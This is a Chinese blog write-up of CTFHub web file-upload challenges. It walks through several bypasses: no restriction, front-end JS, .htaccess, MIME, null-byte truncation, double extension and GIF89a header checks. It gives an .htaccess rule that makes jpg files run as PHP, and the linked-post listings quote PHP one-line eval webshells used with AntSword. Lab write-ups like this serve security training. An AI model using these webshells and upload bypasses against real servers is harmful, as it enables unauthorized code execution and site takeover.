CTFHub-web-文件上传

于 2024-07-31 20:41:43 发布
阅读量385 收藏 4
点赞数 15
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/140832180
版权

文件上传 - 无限制

写一个1.php一句话木马(同时也是2.png/2.jpg因为我电脑有1.png/1.jpg)只是单纯修改后缀

直接上传

蚁剑连接

连接成功查看

后续都一致

文件上传 - js前端验证

上传1.php

发现

尝试上传图片

发现可以,那我们将1.php修改后缀为2.png上传抓包

放包显示

蚁剑连接

后面步骤都一致

文件上传 - htaccess

黑名单过滤了所有的能执行的后缀名,如果允许上传.htaccess。htaccess 文件的作用是可以帮 我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定 IP 地址的用户、只允许特定 IP 地址的用户、禁止目录列表,以及使用其他文件作为 index 文件等一些功 能;

在 htaccess 里写入 SetHandler application/x-httpd-php 则可以文件重写成 php 文件。要 htaccess 的 规则生效 则需要在 apache 开启 rewrite 重写模块,因为 apache 是多数都开启这个模块,所以规则一般 都生效;

<FilesMatch "jpg">
 SetHandler application/x-httpd-php
 </FilesMatch>

将1.php修改为2.jpg

蚁剑连接

MIME绕过

将2.png上传抓包修改

蚁剑连接

00截断

上传2.jpg抓包修改

成功蚁剑连接

双写后缀

上传2.php(跟1.php一样,但是防止搞混)

发现路径消失php只有2.

选择双写绕过,抓包修改

双写后发现上传成功

蚁剑连接

文件头检查

上传2.php

什么是GIF89a

一个GIF89a图形文件就是一个根据图形交换格式(GIF)89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片。

上传2.png抓包修改

蚁剑连接

mouyu⇔
关注
CTFHub_文件上传
weixin_47443077的博客
08-06 671
CTFHub_文件上传 文章目录CTFHub_文件上传0x01 无验证0x02 js前端验证0x03 .htaccess0x04 MIME绕过0x05 00截断0x06 双写后缀 0x01 无验证 打开页面如图示: 上传一句话木马用蚁剑连接 <?php @eval($_POST[cmd]);?> 因为没有任何限制,就直接上传.php木马文件 上传成功,显示上传文件相对路径,用蚁剑连接 连接成功,可在/var/www/html下找到flag! 0x02 js前端验证 打开页面如图示:
CTFHub-WEB-文件上传
K_ShenH的博客
06-14 1528
CTFHub-WEB-文件上传
CTFHub-文件上传-无限制
qq_60905276的博客
11-18 381
随便上传个木马, <?php eval($_POST["sb"]); phpinfo(); ?> 然后用蚁剑配置如下连接密码是sb,因为我已经在小牛马.php中post了。 然后再查看文件,找到flag。
CTFHub web 文件上传- 无限制
wrypot的博客
03-14 269
上传一个含一句话木马的.jpg文件,抓包后将.jpg改为.php后上传,go一下即可。这是我们上传的文件的路径,上一个路径,文件夹html里面就有key。然后再之前的路径后面加上upload/.php的路径,就可以了。CTFHub 文件上传 - 无限制
CTFHUB--WEB文件上传(无限制
yuanqiqi_的博客
07-08 541
上传php文件 php的内容: <?php@eval($_POST['attack']);?> 上传成功后将php文件的路径(头部页面地址+上传文件相对路径)输入蚁剑中进行查询 在文件列表找到提示的页面并打开,就能获得flag ...
CTFHub技能树web(持续更新)--文件上传--无限制
jiuyongpinyin的博客
11-30 1042
限制 好长时间没有更新了,这次开始更新剩下的部分 首先除了最基本的后缀名绕过,还可能存在: 1.前端的js绕过,例如前端使用“onchang”标签过滤上传文件,可在控制台中更改标签打到上传目的。 2.MIME,例如 image/jpg。 3.Getimagesize,例如图片马 这个在后面的文章中就不再赘述了,这道题显然知识热热身,我们首先尝试上传一张正常的图片并使用burpsuite抓包看一下: 我们看到不仅上传成功,还返回了路径,其实文件上传大部分的思路是一样的,就看找他如何绕过前端或者后端的检查,
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1438
CTF简介以及信息泄露下题目解题过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
CTFHUB-web-SSRF
ookami6497的博客
03-25 889
CTFHUB-web-ssrf
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7248
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub文件上传
2202_75317918的博客
01-19 1271
ctfhub文件上传
CTFHub 文件上传
weixin_63289925的博客
03-01 4682
(无验证) 一句话木马:一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。用最为常见的php一句话木马为例,<?php?>为php固定规范写法,@在php中含义为后面如果执行错误不会报错,eval()函数表示括号里的语句全做代码执行,$_POST['password']表示从页面中以post方式获取变量password的值。 ...
CTFHUB-文件上传
m0_64180167的博客
12-25 1307
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php才上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传。
CTFHubweb文件上传
2301_81105268的博客
04-02 920
通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。当你连接一些公网时,可能文件上传操作正确但无法成功,是因为一些网络具备了高级的防火墙,无法上传一句话木马等病毒文件。使用重放器发送,在响应栏中可以看到网页返回200,说明文件上传成功。发送到重放器后,将1.php修改为1.php%00.jpg。查看源代码,只允许上传图片类型(jpg,png,gif)查看源代码,简单的文件上传,没有限制
CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证)
最新发布
Static______的博客
04-15 1336
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功。此时,再上传一句话木马,并把文件改为png格式。
CTFCTFHub------web-文件上传-无验证/前端验证
从零开始的网安生活
07-23 939
文章目录文件上传无验证 文件上传 无验证 1.打开记事本写入 <?php eval($_POST['123'])?> 保存为a.txt,重命名为a.php 2.根据提示上传a.php文件 3.打开蚁剑,添加数据 4.添加成功,点开,翻找目录,在html下发现flag文件,点开即获得flag ...
限制文件上传
j1193848932的博客
10-18 2055
描述 上传的文件代表了显著风险的应用程序。在许多攻击的第一步骤是获得一些代码来对系统进行攻击。那么攻击只需要找到一种方式来获得执行的代码。使用文件上载帮助攻击者完成第一步。 不受限制文件上传的后果可能会有所不同,包括完整的系统接管,超载文件系统或数据库,转发攻击后端系统,以及简单的污损。这取决于应用程序是否与上传的文件是什么,尤其是存储位置。 实际上有两类问题在这里。第一个是与文件的元
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值